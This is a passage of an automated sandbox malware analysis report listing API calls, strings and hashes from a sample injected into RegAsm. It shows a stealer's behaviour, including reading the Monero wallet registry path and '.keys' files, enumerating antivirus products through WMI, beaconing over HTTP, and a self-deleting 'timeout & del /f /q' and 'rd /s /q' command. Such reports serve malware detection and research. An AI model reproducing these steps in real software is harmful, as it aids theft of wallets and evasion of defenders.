                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004050AE
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 004050B7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                              • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                              • API String ID: 2435781452-2509457195
                                                                                                                                                                                                                                                              • Opcode ID: 3d4d4fbf26e2ebf7978a75a9513504c8807dfac8bef4b05161d3d4dffaa68466
                                                                                                                                                                                                                                                              • Instruction ID: 79a678b2a0cc494efcc75dc192dd75b184ed620f9fc102e1b788574175dbcc72
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d4d4fbf26e2ebf7978a75a9513504c8807dfac8bef4b05161d3d4dffaa68466
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C514B72900119AFEF11EFA1DC85EEEBB79EB14704F10446AF901B3291DB785E448BA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00412134
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00412154
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00412160
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00412175
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00412301
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041230E
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0041231C
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041232D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                                                              • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                                                                                                                                                                                                                                              • API String ID: 1312519015-206210831
                                                                                                                                                                                                                                                              • Opcode ID: 079a472300c27e88ffed433689cc8301d48fc7e5681a3338de1409c8953012c6
                                                                                                                                                                                                                                                              • Instruction ID: a95e39b80cde994f58bb11824b5be420eb5c6529c63548b5b8daa7a73a06ae64
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 079a472300c27e88ffed433689cc8301d48fc7e5681a3338de1409c8953012c6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F5121B1C0024CEADB05EBE1C986AEEBBBCAF14304F54446EA505B3182DB785B59CB75
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040F3D0
                                                                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F3E0
                                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040F3F1
                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00424EE8,00000000,00000001,00424E18,?,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F40B
                                                                                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000), ref: 0040F441
                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0040F490
                                                                                                                                                                                                                                                                • Part of subcall function 0040F70F: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0040F4B6,?,?,00000000,?,Work Dir: In memory,00000000,?,00424504,00000000,?,00000000), ref: 0040F717
                                                                                                                                                                                                                                                                • Part of subcall function 0040F70F: CharToOemW.USER32(?,00000000), ref: 0040F723
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040F4C4
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                              • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                              • API String ID: 3694693100-2776955613
                                                                                                                                                                                                                                                              • Opcode ID: 894f7d78f336269578b6be0df3461f30d148b76dc4dd98a4a7241ccd7c9a342a
                                                                                                                                                                                                                                                              • Instruction ID: 7c94074b8788e290bbbac647dbb775cc57d783b3226285f7529473d301ade818
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 894f7d78f336269578b6be0df3461f30d148b76dc4dd98a4a7241ccd7c9a342a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9313A71A41229BBDB20DB91DC49EEF7F78FF49B50F10452AF515B6280C7789601CBA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040EB5A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004241CF,00000000,00000000), ref: 0040EBA2
                                                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 0040EBEC
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0040EC16
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040EC33
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040EC5D
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040EC72
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00424200), ref: 0040ECF2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                              • API String ID: 404191982-3278919252
                                                                                                                                                                                                                                                              • Opcode ID: d5c9b3819611949e53c760e709a4fbd40657d89aa9f1208d49f3daee27195a02
                                                                                                                                                                                                                                                              • Instruction ID: 99bb9dff017734bbee94ef9c19374972677afa949dcf6876cc7056feb3432fab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5c9b3819611949e53c760e709a4fbd40657d89aa9f1208d49f3daee27195a02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D71077280021DEEDF05EFA2DD84AEEBBBDFF18304F14446AE505B2191DB385A19CB65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040E055
                                                                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT ref: 0040E06B
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0040E08D
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E0CF
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 0040E208
                                                                                                                                                                                                                                                                • Part of subcall function 0040DF0D: strlen.MSVCRT ref: 0040DF24
                                                                                                                                                                                                                                                                • Part of subcall function 0040DBBC: memcpy.MSVCRT ref: 0040DBDC
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • N0ZWFt, xrefs: 0040E172, 0040E17F
                                                                                                                                                                                                                                                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040E0E7, 0040E1D0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologOpenProcessmemcpymemsetstrlen
                                                                                                                                                                                                                                                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                              • API String ID: 3050127167-1622206642
                                                                                                                                                                                                                                                              • Opcode ID: f71852b4dc57eaefec0a5939e57b522f91c5d7858faa335481137a491dd5dbd4
                                                                                                                                                                                                                                                              • Instruction ID: c7133534bbbd3e2470f914545098ef9dffeb47121235e0abce75ea37944e2468
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f71852b4dc57eaefec0a5939e57b522f91c5d7858faa335481137a491dd5dbd4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B51A071E04119AEDB10EB91DC82EEEBBB9EF44354F10047EF111B62C1DA795E88CB59
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040EFC6
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040EFE9
                                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F01B
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F05E
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F065
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0040F091
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,004241A8), ref: 0040F0A0
                                                                                                                                                                                                                                                                • Part of subcall function 0040EF86: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EF97
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040F0BF
                                                                                                                                                                                                                                                                • Part of subcall function 0040FBD6: malloc.MSVCRT ref: 0040FBE4
                                                                                                                                                                                                                                                                • Part of subcall function 0040FBD6: strncpy.MSVCRT ref: 0040FBF4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040F0EC
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                              • String ID: :\$C
                                                                                                                                                                                                                                                              • API String ID: 688099012-3309953409
                                                                                                                                                                                                                                                              • Opcode ID: 0bcebe92465a7a92cbea065f3323c3af507c312008c3df8e97f61e22e3136c30
                                                                                                                                                                                                                                                              • Instruction ID: 21b1a67321f8a6d24ce454ee99169210ff371cc83a106d68236fb6aef6421878
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bcebe92465a7a92cbea065f3323c3af507c312008c3df8e97f61e22e3136c30
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92418E72801159AACB11EBE6DD899EFBBBDEF49304F10087EF401B3141DA384A19CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00411B69
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: _EH_prolog.MSVCRT ref: 00404EF7
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F5A
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: StrCmpCA.SHLWAPI(?), ref: 00404F6E
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404F91
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FC7
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404FEB
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404FF6
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405014
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411BEB
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00411C02
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7EF: LocalAlloc.KERNEL32(00000040,00411C18,00000001,00000000,?,00411C17,00000000,00000000), ref: 0040F808
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00411C29
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00411C3E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00411C59
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                              • API String ID: 3807055897-1526165396
                                                                                                                                                                                                                                                              • Opcode ID: 10e399d1f04da16177a1dc4c6de4d81cdc987d3e5c45476915a2faf5dc38b38d
                                                                                                                                                                                                                                                              • Instruction ID: 41a7fa48013b42fb793d60589e812285dc4a9145a1393323b16df02da28cd504
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10e399d1f04da16177a1dc4c6de4d81cdc987d3e5c45476915a2faf5dc38b38d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5141A771901254AACB04FFE2D955BED7BA8EF19308F10446FF905732C1EB785B14C6AA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00401C51
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00401C6F
                                                                                                                                                                                                                                                                • Part of subcall function 00401077: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040108B
                                                                                                                                                                                                                                                                • Part of subcall function 00401077: HeapAlloc.KERNEL32(00000000,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401092
                                                                                                                                                                                                                                                                • Part of subcall function 00401077: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004010AB
                                                                                                                                                                                                                                                                • Part of subcall function 00401077: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004010C4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00401C93
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?), ref: 00401CA0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,.keys), ref: 00401CBB
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623
